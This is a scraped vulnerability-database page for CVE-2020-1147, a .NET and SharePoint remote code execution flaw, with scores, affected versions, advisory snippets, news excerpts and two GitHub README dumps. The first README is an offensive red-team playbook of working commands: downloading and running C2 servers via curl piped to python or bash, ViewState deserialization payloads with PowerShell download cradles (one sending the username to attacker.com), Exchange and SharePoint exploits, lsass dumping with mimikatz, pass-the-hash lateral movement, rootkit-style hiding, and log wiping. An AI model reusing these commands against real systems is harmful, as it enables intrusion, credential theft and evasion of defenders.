6.8
CVSSv2

CVE-2020-1147

Published: 14/07/2020 Updated: 31/07/2020
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Microsoft .NET Framework, SharePoint, and Visual Studio could allow a remote malicious user to execute arbitrary code on the system, caused by failing to check the source markup of XML file input. By uploading a specially crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system with privileges of the victim.

Vulnerability Trend

Affected Products

Vendor Product Versions
Microsoft.net Core2.1, 3.1
Microsoft.net Framework2.0, 3.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8
MicrosoftSharepoint Enterprise Server2013, 2016
MicrosoftSharepoint Server2010, 2019
MicrosoftVisual Studio 201715.0, 15.1, 15.1.1, 15.1.2, 15.2, 15.2.1, 15.2.2, 15.2.3, 15.2.4, 15.2.5, 15.3, 15.3.1, 15.3.2, 15.3.3, 15.3.4, 15.3.5, 15.4, 15.4.1, 15.4.2, 15.4.3, 15.4.4, 15.4.5, 15.5, 15.5.1, 15.5.2, 15.5.3, 15.5.4, 15.5.5, 15.5.6, 15.5.7, 15.6, 15.6.1, 15.6.2, 15.6.3, 15.6.4, 15.6.5, 15.6.6, 15.6.7, 15.7, 15.7.1, 15.7.2, 15.7.3, 15.7.4, 15.7.5, 15.7.6, 15.8, 15.8.1, 15.8.2, 15.8.3, 15.8.4, 15.8.5, 15.8.6, 15.8.7, 15.8.8, 15.9
MicrosoftVisual Studio 201916.0, 16.0.1, 16.0.2, 16.0.3, 16.0.4, 16.0.5, 16.0.6, 16.0.7, 16.1, 16.1.1, 16.1.2, 16.1.3, 16.1.4, 16.1.5, 16.1.6, 16.2, 16.2.1, 16.2.2, 16.2.3, 16.2.4, 16.3, 16.3.0, 16.3.1, 16.3.2, 16.3.3, 16.3.4, 16.3.5, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.4, 16.4.1, 16.4.2, 16.4.3, 16.4.4, 16.4.5, 16.4.6, 16.5, 16.5.0, 16.5.1, 16.5.2, 16.6

Vendor Advisories

Synopsis Critical: NET Core security and bugfix update Type/Severity Security Advisory: Critical Topic An update for NET Core is now available for Red Hat Enterprise Linux 8Red Hat Product Security has rated this update as having a security impact of Critical A Common Vulnerability Scoring System (CVSS) ...
Synopsis Critical: NET Core 21 on Red Hat Enterprise Linux security and bugfix update Type/Severity Security Advisory: Critical Topic An update for rh-dotnet21-dotnet is now available for NET Core on Red Hat Enterprise LinuxRed Hat Product Security has rated this update as having a security impact of Cr ...
Synopsis Critical: NET Core 31 on Red Hat Enterprise Linux security and bugfix update Type/Severity Security Advisory: Critical Topic An update for rh-dotnet31-dotnet is now available for NET Core on Red Hat Enterprise LinuxRed Hat Product Security has rated this update as having a security impact of Cr ...
Synopsis Critical: NET Core security and bugfix update Type/Severity Security Advisory: Critical Topic An update for NET Core is now available for Red Hat Enterprise Linux 8Red Hat Product Security has rated this update as having a security impact of Critical A Common Vulnerability Scoring System (CVSS) ...
Synopsis Critical: NET Core 31 security and bugfix update Type/Severity Security Advisory: Critical Topic An update for NET Core 31 is now available for Red Hat Enterprise Linux 8Red Hat Product Security has rated this update as having a security impact of Critical A Common Vulnerability Scoring Syste ...
Synopsis Critical: NET Core security update Type/Severity Security Advisory: Critical Topic An update for NET Core is now available for Red Hat Enterprise Linux 80 Update Services for SAP SolutionsRed Hat Product Security has rated this update as having a security impact of Critical A Common Vulnerabil ...

Github Repositories

master 2 branches 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit wshepherd0010 Update README.md … af3df1c 9 minutes ago Update README.md af3df1c Git stats 32 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time c2 Update README.md 21 hours ago modules add to snippet 19 hours ago scripts Update README.md 19 hours ago LICENSE Initial commit 3 days ago README.md Update README.md 9 minutes ago View code README.md CS2020 repository MSEL concepts: Authenticated C2 via ICMP on Linux and Windows Fallback channels using hardcoded IPs and calculated subnets Proxied lateral movement using PTT/PTH via WMI, RPC/DCOM, SMB, and WinRM Defense evasion using in-memory payloads, encryption, timestamp modification, and byte randomization Credential access using Mimikittenz, Mimikatz, Minidump, Rubeus, and InternalMonologue Privilege escalation using process injection, parent process spoofing, and token theft DMZ # initial access python3 pfsense_auth_2.2.6_exec.py localhost:65535 nc <IP> proxychains hydra -L ~/users.txt -P ~/passwords.txt <IP> ssh -u -V; ssh <USER>@<IP> # on penetration, backup C2 and proxy nohup curl --insecure -sv https://<IP>/c2_http_basic_server.py|python - & disown nohup curl --insecure -sv https://<IP>/c2_python_proxy_server.py|python - & disown ssh -f -N -D <IP>:65535 root@localhost # edit proxychains.conf localnet 127.0.0.0/255.0.0.0 socks4 <IP> <PORT> <PASSWORD> # maintaining access, root user and SSH # passwd root (out of scope) adduser <c2_NAME> usermod -aG sudo <c2_NAME> ssh-keygen -t rsa # proxy via icmp echo 1> /proc/sys/net/ipv4/icmp_echo_ignore_all nohup curl --insecure -sv https://<IP>/IcmpTunnel_S.py|python - & disown # local icmp tunnel python IcmpTunnel_C.py <IP> <TARGETIP> <TARGETPORT> # icmp elf shell sysctl -w net.ipv4.icmp_echo_ignore_all=1 curl --insecure https://<IP>/icmp_basic_server -o c2_icmp_basic_server && chmod +x c2_icmp_basic_server # post exploitation curl --insecure -sv https://<IP>/redghost.sh| bash - mkdir /bin/.usr/ && cd /bin/.usr/ && curl --insecure https://<IP>/bash_hide.sh -o c2_bash_hide.sh && chmod +x c2_bash_hide.sh # edit c2_bash_hide.sh THINGTOHIDE=c2 # edit ~/.bashrc's PATH=/bin/.usr/:${PATH} # file located in first path /bin/.usr/c2_bash_hide.sh for f in "netstat" "iptables" "kill" "ps" "pgrep" "pkill" "ls" "rm" "rmdir" "passwd" "shutdown" "chmod" "sudo" "su" "cat" "useradd" "id" "ln" "unlink" "which" "gpasswd" "bash" "sh" "env" "echo" "history" "tcpdump" "chattr" "lsattr" "export" "mv" "grep" "egrep" "find"; do ln -s /bin/.usr/c2_bash_hide.sh /bin/.usr/${f}; done; # lock files, keep password, encrypt for f in "~/.bashrc" "/bin/.usr/c2_bash_hide.sh" "/etc/shadow" "/etc/group" "/etc/sudoers" "/root/.ssh/id_rsa*" "/<c2_NAME>/.ssh/id_rsa*"; do chattr +i ${f}; done; openssl enc -aes-256-cbc -salt -pbkdf2 -in chattr -out chattr.tmp -k <PASSWORD> & mv chattr.tmp chattr; # clear timestamps and logs for f in `find /var/log/ -type f -name "*" 2>/dev/null`; do echo "" > ${f} 2>&1> /dev/null; done; for f in `find / -type f -name "*" 2>/dev/null`; do touch ${f} 2>&1> /dev/null; done; history -c && echo "" > ~/.bash_history GREYZONE # initial access proxychains ruler --domain <TARGET> --insecure brute --users ~/users.txt --passwords ~/passwords.txt --delay 0 --verbose proxychains exchange_scanner_cve-2020-0688.py -s <SERVER> -u <USER> -p <PASSWORD> proxychains exchange_cve-2020-0688.py -s <SERVER> -u <USER> -p <PASSWORD> -c CMD "powershell.exe -exec bypass -noninteractive -windowstyle hidden -c iex((new-object system.net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1'))" # edit /tmp/command.txt CreateObject("Wscript.Shell").Run "powershell.exe -exec bypass -noninteractive -windowstyle hidden -c iex((new-object system.net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1'))", 0, False # reverse shell proxychains ruler --email <USER>@<TARGET> form add --suffix superduper --input /tmp/command.txt --rule --send # on penetration Survey InstallWMIPersistence <EventFilterName> <EventConsumerName> SetFallbackNetwork <PAddress> <subnetMask> invoke_file /tmp/socks_proxy_server.ps1 iex(new-object net.webclient).downloadstring('<URL>socks_proxy_server.ps1') # edit proxychains.conf socks4 <IP> <PORT> # maintaining access from icmp c2, migrate to explorer etc.. InstallPersistence 1 InstallPersistence 2 InstallPersistence 3 GetProcess invoke_file /tmp/InjectShellcode.ps1 msfvenom -a x64 --platform windows -p windows/x64/exec cmd="powershell \"iex(new-object net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1')\"" -f powershell; Inject-Shellcode -Shellcode $buff ParentID <TARGETPID> -QueueUserAPC # downgrade for DES hash, crack DES for NTLM invoke_file /tmp/Get-Hash.ps1 Get-Hash # lsass mini-dump for NTLM or plaintext invoke_file /tmp/Out-Minidump.ps1 Get-Process lsass| Out-Minidump -DumpFilePath C:\temp TimeStomp c:\temp\lsass_<PID>.dmp "01/03/2012 12:12 pm" download c:\temp\lsass_<PID>.dmp SecureDelete c:\temp\lsass_<PID>.dmp mimikatz # sekurlsa::minidump lsass.dmp mimikatz # sekurlsa::logonPasswords full # lsa secrets for NTLM invoke_file /tmp/Invoke-PowerDump.ps1 Invoke-PowerDump # clear logs foreach($log in (get-eventlog -list|foreach-object {$_.log})){ clear-eventlog -logname $_; } EXTERNAL .NET SITE # grab viewstate info curl -sv http:<URL>/Content/Default.aspx 2>&1|egrep "__VIEWSTATE|__VIEWSTATEENCRYPTED|__VIEWSTATEGENERATOR|__EVENTVALIDATION" > viewstate.txt & # test case: 1 – enableviewstatemac=false and viewstateencryptionmode=false ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe -exec bypass -noninteractive -windowstyle hidden -c iex((new-object system.net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1'))" # test case: 2 – .net < 4.5 and enableviewstatemac=true & viewstateencryptionmode=false AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <BASE64VIEWSTATE> --purpose=viewstate --valalgo=sha1 --decalgo=aes --modifier=<VIEWSTATEGENERATOR> --macdecode --legacy ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=<VIEWSTATEGENERATOR> --validationalg="SHA1" --validationkey="<VALIDATIONKEY>" # test case: 3 – .net < 4.5 and enableviewstatemac=true/false and viewstateencryptionmode=true, remove __VIEWSTATEENCRYPTED curl -sv 'http://<URL>/Content/default.aspx' \ -H 'Connection: keep-alive' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)' \ -H 'Accept: */*' \ -H 'Accept-Language: en-US,en;q=0.9' \ --data-raw '__EVENTTARGET=ddlReqType&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=<VIEWSTATEBASE64>&__VIEWSTATEGENERATOR=<VIEWSTATEGENERATOR>&__EVENTVALIDATION=<VALIDATIONBASE64>&ddlReqType=Create' 2>&1|egrep -i "validation of viewstate mac failed|may be encrypted" # test case: 4 – .net >= 4.5 and enableviewstatemac=true/false and viewstateencryptionmode=true/false except both attribute to false AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <BASE64VIEWSTATE> --decrypt --purpose=viewstate --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx" ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -exec bypass -noninteractive -windowstyle hidden -c iex((new-object system.net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1'))" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="<DECRYPTIONKEY>" --validationalg="SHA1" --validationkey="<VALIDATIONKEY>" # initial access curl -sv 'http://<URL>/Content/default.aspx' \ -H 'Connection: keep-alive' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)' \ -H 'Accept: */*' \ -H 'Accept-Language: en-US,en;q=0.9' \ --data-raw '__EVENTTARGET=ddlReqType&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=<URLENCODEDPAYLOAD>&__VIEWSTATEGENERATOR=<VIEWSTATEGENERATOR>&__EVENTVALIDATION=<VALIDATIONBASE64>&ddlReqType=Create' 2>&1 # on penetration Survey InstallWMIPersistence <EventFilterName> <EventConsumerName> SetFallbackNetwork <PAddress> <subnetMask> invoke_file /tmp/socks_proxy_server.ps1 iex(new-object net.webclient).downloadstring('<URL>socks_proxy_server.ps1') # edit proxychains.conf socks4 <IP> <PORT> # maintaining access from icmp c2, migrate to explorer etc.. InstallPersistence 1 InstallPersistence 2 InstallPersistence 3 GetProcess invoke_file /tmp/InjectShellcode.ps1 msfvenom -a x64 --platform windows -p windows/x64/exec cmd="powershell \"iex(new-object net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1')\"" -f powershell; Inject-Shellcode -Shellcode $buff ParentID <TARGETPID> -QueueUserAPC # downgrade for DES hash, crack DES for NTLM invoke_file /tmp/Get-Hash.ps1 Get-Hash # lsass mini-dump for NTLM or plaintext invoke_file /tmp/Out-Minidump.ps1 Get-Process lsass| Out-Minidump -DumpFilePath C:\temp TimeStomp c:\temp\lsass_<PID>.dmp "01/03/2012 12:12 pm" download c:\temp\lsass_<PID>.dmp SecureDelete c:\temp\lsass_<PID>.dmp mimikatz # sekurlsa::minidump lsass.dmp mimikatz # sekurlsa::logonPasswords full # lsa secrets for NTLM invoke_file /tmp/Invoke-PowerDump.ps1 Invoke-PowerDump # clear logs foreach($log in (get-eventlog -list|foreach-object {$_.log})){ clear-eventlog -logname $_; } LATERAL MOVEMENT # ongoing access proxychains wmiexec.py -nooutput -no-pass -hashes :<NTLMHASH> <DOMAIN>/<USER>@<IP> "powershell.exe -exec bypass -noninteractive -windowstyle hidden -c iex((new-object system.net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1'))"; proxychains evil-winrm -i <IP> -u <USER> -H <NTLMHASH> -s ./modules -e ./modules -P 5985;Bypass-4MSI proxychains wmiexec.py -no-pass -hashes :<NTLMHASH> <DOMAIN>/<USER>@<IP>; proxychains dcomexec.py -no-pass -hashes :<NTLMHASH> <DOMAIN>/<USER>@<IP>; proxychains atexec.py -no-pass -hashes :<NTLMHASH> <DOMAIN>/<USER>@<IP>; proxychains smbexec.py -no-pass -hashes :<NTLMHASH> <DOMAIN>/<USER>@<IP>; proxychains secretsdump.py -no-pass -hashes :<NTLMHASH> -outputfile <IP>_secrets.txt <DOMAIN>/<USER>@<IP>; # enumeration domain via host invoke_file /tmp/Sharphound.ps1 Invoke-BloodHound -CollectionMethod DCOnly --NoSaveCache --RandomFilenames --EncryptZip TimeStomp c:\temp\<BLOODHOUND>.zip "01/03/2008 12:12 pm" download c:\temp\<BLOODHOUND>.zip SecureDelete c:\temp\<BLOODHOUND>.zip # enumeration domain via proxy proxychains bloodhound-python -c DCOnly -u <USERNAME>@<DOMAIN> --hashes <HASHES> -dc <DCIP> -gc <GCIP> -d <DOMAIN> -v; proxychains pywerview.py get-netuser -w <DOMAIN> -u <USER> --hashes <HASHES> -t <DOMAIN> -d <DOMAIN> proxychains pywerview.py get-netcomputer -w <DOMAIN> -u <USER> --hashes <HASHES> --full-data --ping -t <DOMAIN> -d <DOMAIN> proxychains findDelegation.py -no-pass -hashes <HASHES> -target-domain <DOMAIN> <DOMAIN/USER> proxychains rpcdump.py -port 135 <TARGETDC>|grep "MS-RPRN"; # host discovery proxychains nmap -oA NETWORK_ping_sweep -v -T 3 -PP --data "\x41\x41" -n -sn <NETWORK/CIDR> # fingerprinting services proxychains nmap -v -T 5 -Pn -sT -sC -sV -oA NETWORK_service_fiingerprint_scan --open -p53,135,137,139,445,80,443,3389,386,636,5985,2701,1433,1961,1962 <NETWORK/CIDR> proxychains nmap -v --script http-headers -T 3 --open -p80,443 -oA NETWORK_http_header_scan -iL <IPLIST> # fingerprinting services intrusive/loud proxychains nmap -v -T 5 -Pn -sT --max-rate 100 --min-rtt-timeout 100ms --max-rtt-timeout 100ms --initial-rtt-timeout 100ms --max-retries 0 -oA NETWORK_FAST_service_scan --open -p53,135,137,139,445,80,443,3389,386,636,5985,2701,1433,1961,1962 <NETWORK/CIDR> # sharepoint proxychains python sharepoint_cve-2019-0604.py -target http://<URL> -username <USER> -domain <DOMAIN> -password <PASSWORD> -version 2016 -command "powershell.exe -exec bypass -noninteractive -windowstyle hidden -c iex((new-object system.net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1'))" proxychains python sharepoint_cve-2020-0646.py -target http://<URL> -username <USER> -domain <DOMAIN> -password <PASSWORD> -command "powershell.exe -exec bypass -noninteractive -windowstyle hidden -c iex((new-object system.net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1'))" proxychains python3 smbghost_cve-2020-0796.py <TARGETIP> <REVERSEIP> <REVERSEPORT> # edit the payloads for these proxychains python sharepoint_cve-2020-1147.py -target http://<URL> -username <USER> -domain <DOMAIN> -password <PASSWORD> proxychains python sqlreport_cve_2020-0618.py -target http://<URL> -username <USER> -domain <DOMAIN> -password <PASSWORD> -payload shell # edit shellcode msfvenom -a x64 --platform windows -p windows/x64/exec cmd="powershell \"iex(new-object net.webclient).downloadstring('<URL>/c2_icmp_shell.ps1')\"" -f python proxychains python bluekeep_cve-2019-0708.py <IP> About No description, website, or topics provided. Resources Readme License GPL-3.0 License Releases No releases published Languages PowerShell 95.0% Python 3.1% Ruby 1.0% Shell 0.9% C# 0.0% ASP 0.0%

master 1 branch 43 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit bauthard Adding template details. … Loading status checks… c429207 5 minutes ago Adding template details. c429207 Git stats 814 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time .github/workflows Check all branches during syntax linting 3 months ago basic-detections adding condition 28 days ago brute-force Update tomcat-manager-bruteforce.yaml 4 days ago cves Update CVE-2017-9841.yaml 23 hours ago dns uniform severity update 4 days ago files Update wadl-files.yaml 2 days ago panels uniform severity update 4 days ago payloads Add dedicated payloads dir - CVE-2020-6287 18 days ago security-misconfiguration Update wamp-xdebug-detect.yaml 5 days ago subdomain-takeover Update detect-all-takeovers.yaml 4 days ago technologies tech updates 10 hours ago tokens syntax update 8 days ago vulnerabilities Improve shellshock payload 2 days ago workflows SAP NetWeaver Workflow 18 days ago .gitignore Update .gitignore 10 days ago .pre-commit-config.yaml Add pre-commit and yamllint configuration 3 months ago .yamllint Fixed linting rules for more relaxed 3 months ago LICENSE Create LICENSE 4 months ago README.md Adding template details. 5 minutes ago View code README.md Templates are the core of nuclei scanner which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via pull requests and grow the list. Template Directory ├── LICENSE ├── README.md ├── basic-detections │   ├── basic-xss-prober.yaml │   └── general-tokens.yaml ├── brute-force │   └── tomcat-manager-bruteforce.yaml ├── cves │   ├── CVE-2017-10075.yaml │   ├── CVE-2017-7529.yaml │   ├── CVE-2017-9506.yaml │   ├── CVE-2017-9841.yaml │   ├── CVE-2018-0296.yaml │   ├── CVE-2018-1000129.yaml │   ├── CVE-2018-11409.yaml │   ├── CVE-2018-11759.yaml │   ├── CVE-2018-1247.yaml │   ├── CVE-2018-1271.yaml │   ├── CVE-2018-13379.yaml │   ├── CVE-2018-14728.yaml │   ├── CVE-2018-16341.yaml │   ├── CVE-2018-18069.yaml │   ├── CVE-2018-19439.yaml │   ├── CVE-2018-20824.yaml │   ├── CVE-2018-2791.yaml │   ├── CVE-2018-3714.yaml │   ├── CVE-2018-3760.yaml │   ├── CVE-2018-5230.yaml │   ├── CVE-2018-7490.yaml │   ├── CVE-2019-10475.yaml │   ├── CVE-2019-11510.yaml │   ├── CVE-2019-12314.yaml │   ├── CVE-2019-14322.yaml │   ├── CVE-2019-14974.yaml │   ├── CVE-2019-15043.yaml │   ├── CVE-2019-16759.yaml │   ├── CVE-2019-17382.yaml │   ├── CVE-2019-18394.yaml │   ├── CVE-2019-19368.yaml │   ├── CVE-2019-19781.yaml │   ├── CVE-2019-19908.yaml │   ├── CVE-2019-19985.yaml │   ├── CVE-2019-2588.yaml │   ├── CVE-2019-3396.yaml │   ├── CVE-2019-3799.yaml │   ├── CVE-2019-5418.yaml │   ├── CVE-2019-8449.yaml │   ├── CVE-2019-8451.yaml │   ├── CVE-2019-8903.yaml │   ├── CVE-2019-8982.yaml │   ├── CVE-2020-10199.yaml │   ├── CVE-2020-10204.yaml │   ├── CVE-2020-1147.yaml │   ├── CVE-2020-12720.yaml │   ├── CVE-2020-13167.yaml │   ├── CVE-2020-2096.yaml │   ├── CVE-2020-3187.yaml │   ├── CVE-2020-3452.yaml │   ├── CVE-2020-5284.yaml │   ├── CVE-2020-5405.yaml │   ├── CVE-2020-5410.yaml │   ├── CVE-2020-5902.yaml │   ├── CVE-2020-6287.yaml │   ├── CVE-2020-7209.yaml │   ├── CVE-2020-7961.yaml │   ├── CVE-2020-8091.yaml │   ├── CVE-2020-8115.yaml │   ├── CVE-2020-8191.yaml │   ├── CVE-2020-8193.yaml │   ├── CVE-2020-8194.yaml │   ├── CVE-2020-8512.yaml │   ├── CVE-2020-8982.yaml │   ├── CVE-2020-9484.yaml │   └── CVE-2020-9757.yaml ├── dns │   ├── azure-takeover-detection.yaml │   ├── cname-service-detector.yaml │   ├── dead-host-with-cname.yaml │   └── servfail-refused-hosts.yaml ├── files │   ├── apc-info.yaml │   ├── cgi-test-page.yaml │   ├── debug-pprof.yaml │   ├── dir-listing.yaml │   ├── docker-registry.yaml │   ├── drupal-install.yaml │   ├── elasticsearch.yaml │   ├── exposed-kibana.yaml │   ├── exposed-svn.yaml │   ├── filezilla.yaml │   ├── firebase-detect.yaml │   ├── git-config.yaml │   ├── htaccess-config.yaml │   ├── jkstatus-manager.yaml │   ├── jolokia.yaml │   ├── laravel-env.yaml │   ├── lazy-file.yaml │   ├── phpinfo.yaml │   ├── public-tomcat-instance.yaml │   ├── security.txt.yaml │   ├── server-status-localhost.yaml │   ├── telerik-dialoghandler-detect.yaml │   ├── telerik-fileupload-detect.yaml │   ├── tomcat-scripts.yaml │   ├── wadl-files.yaml │   ├── web-config.yaml │   ├── wordpress-directory-listing.yaml │   ├── wordpress-user-enumeration.yaml │   ├── wp-xmlrpc.yaml │   └── zip-backup-files.yaml ├── panels │   ├── atlassian-crowd-panel.yaml │   ├── cisco-asa-panel.yaml │   ├── citrix-adc-gateway-detect.yaml │   ├── compal.yaml │   ├── crxde.yaml │   ├── docker-api.yaml │   ├── fortinet-fortigate-panel.yaml │   ├── globalprotect-panel.yaml │   ├── grafana-detect.yaml │   ├── jenkins-asyncpeople.yaml │   ├── jmx-console.yaml │   ├── kubernetes-pods.yaml │   ├── mongo-express-web-gui.yaml │   ├── parallels-html-client.yaml │   ├── phpmyadmin-panel.yaml │   ├── pulse-secure-panel.yaml │   ├── rabbitmq-dashboard.yaml │   ├── sap-netweaver-detect.yaml │   ├── sap-recon-detect.yaml │   ├── sophos-fw-version-detect.yaml │   ├── supervpn-panel.yaml │   ├── swagger-panel.yaml │   ├── tikiwiki-cms.yaml │   ├── weave-scope-dashboard-detect.yaml │   └── webeditors.yaml ├── payloads │   └── CVE-2020-6287.xml ├── security-misconfiguration │   ├── basic-cors-flash.yaml │   ├── basic-cors.yaml │   ├── front-page-misconfig.yaml │   ├── jira-service-desk-signup.yaml │   ├── jira-unauthenticated-dashboards.yaml │   ├── jira-unauthenticated-popular-filters.yaml │   ├── jira-unauthenticated-projects.yaml │   ├── jira-unauthenticated-user-picker.yaml │   ├── rabbitmq-default-admin.yaml │   ├── rack-mini-profiler.yaml │   ├── springboot-detect.yaml │   └── wamp-xdebug-detect.yaml ├── subdomain-takeover │   ├── detect-all-takeovers.yaml │   └── s3-subtakeover.yaml ├── technologies │   ├── bigip-config-utility-detect.yaml │   ├── citrix-vpn-detect.yaml │   ├── clockwork-php-page.yaml │   ├── couchdb-detect.yaml │   ├── github-enterprise-detect.yaml │   ├── gitlab-detect.yaml │   ├── graphql.yaml │   ├── home-assistant.yaml │   ├── jaspersoft-detect.yaml │   ├── jira-detect.yaml │   ├── liferay-portal-detect.yaml │   ├── linkerd-badrule-detect.yaml │   ├── linkerd-ssrf-detect.yaml │   ├── netsweeper-webadmin-detect.yaml │   ├── ntlm-directories.yaml │   ├── prometheus-exposed-panel.yaml │   ├── s3-detect.yaml │   ├── sap-netweaver-as-java-detect.yaml │   ├── sap-netweaver-detect.yaml │   ├── sql-server-reporting.yaml │   ├── tech-detect.yaml │   ├── weblogic-detect.yaml │   └── werkzeug-debugger-detect.yaml ├── tokens │   ├── amazon-mws-auth-token-value.yaml │   ├── aws-access-key-value.yaml │   ├── google-api-key.yaml │   ├── http-username-password.yaml │   ├── mailchimp-api-key.yaml │   └── slack-access-token.yaml ├── vulnerabilities │   ├── cached-aem-pages.yaml │   ├── couchdb-adminparty.yaml │   ├── crlf-injection.yaml │   ├── discourse-xss.yaml │   ├── git-config-nginxoffbyslash.yaml │   ├── ibm-infoprint-directory-traversal.yaml │   ├── microstrategy-ssrf.yaml │   ├── moodle-filter-jmol-lfi.yaml │   ├── moodle-filter-jmol-xss.yaml │   ├── nginx-module-vts-xss.yaml │   ├── open-redirect.yaml │   ├── oracle-ebs-bispgraph-file-access.yaml │   ├── pdf-signer-ssti-to-rce.yaml │   ├── rce-shellshock-user-agent.yaml │   ├── rce-via-java-deserialization.yaml │   ├── springboot-actuators-jolokia-xxe.yaml │   ├── symfony-debugmode.yaml │   ├── tikiwiki-reflected-xss.yaml │   ├── tomcat-manager-pathnormalization.yaml │   ├── twig-php-ssti.yaml │   ├── wordpress-duplicator-path-traversal.yaml │   ├── wordpress-wordfence-xss.yaml │   └── x-forwarded-host-injection.yaml └── workflows ├── bigip-pwner-workflow.yaml ├── jira-exploitaiton-workflow.yaml ├── liferay-rce-workflow.yaml ├── netsweeper-preauth-rce-workflow.yaml ├── rabbitmq-workflow.yaml ├── sap-netweaver-workflow.yaml └── springboot-pwner-workflow.yaml 13 directories, 204 templates. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. Notes: Use YAMLlint (e.g. yamllint) to validate new templates when sending pull requests. Use YAML Formatter (e.g. jsonformatter) to format new templates when sending pull requests. Thanks again for your contribution and keeping the community vibrant. About Community curated list of template files for the nuclei engine to find security vulnerability and fingerprinting the targets. github.com/projectdiscovery/nuclei Topics nuclei-templates nuclei bugbounty security content-bruteforcing Resources Readme License MIT License Releases 43 v4.0.2 Latest 22 hours ago + 42 releases Contributors 67 + 56 contributors

Recent Articles

Critical SharePoint flaw dissected, RCE details now available
BleepingComputer • Ionut Ilascu • 22 Jul 2020

Details are now available for exploiting a critical security vulnerability that affects Microsoft SharePoint, increasing the risk of attacks on unpatched systems.
A technical blog post this week explains how the bug works and how a low-privileged user can leverage it to run arbitrary code remotely on a target SharePoint server.



PLAY



...

The Register

Mega Patch Tuesday Microsoft on Tuesday patched a wormable hole in its Windows Server software that can be exploited remotely to completely commandeer the machine without any authorization. It was one of hundreds of security bugs squashed today by Redmond along with Oracle, Adobe, VMware, SAP and Google.
Microsoft emitted fixes for 123 vulnerabilities in this month's Patch Tuesday batch. Some 18 of those CVE-listed security flaws are considered critical, meaning remote code execution (RCE)...